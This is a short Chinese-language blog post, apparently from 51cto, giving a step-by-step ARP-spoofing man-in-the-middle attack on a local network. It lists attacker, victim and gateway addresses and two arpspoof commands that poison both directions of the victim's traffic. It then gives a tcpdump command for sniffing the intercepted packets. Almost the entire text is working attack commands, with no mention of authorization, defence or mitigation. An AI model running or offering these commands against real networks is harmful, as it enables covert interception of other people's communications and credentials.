kail:172.16.1.254
被攻擊者:172.16.1.103
網關:172.16.1.1
kail linux 打開兩個終端,
1、arpspoof -i wlan0 -t 172.16.1.103 172.16.1.1
將 172.16.1.103 發給網關172.16.1.1的數據先發送到本機,再由本機進行轉發,前提是本機已經開啟路由。
2、arpspoof -i wlan0 -t 172.16.1.1 172.16.1.103
將 網關172.16.1.1 發往172.16.1.103 的數據先發送到本機,再由本機進行轉發。
通過以上兩條命令可以保證172.16.1.103 的請求和回包都會經過本機。進而可以通過本機上的嗅探工具進行分析。
最簡單的tcpdump -nnvvi wlan0 host 172.16.1.103
本文出自 “lihongweibj” 博客,請務必保留此出處http://lihongweibj.blog.51cto.com/6235038/1771277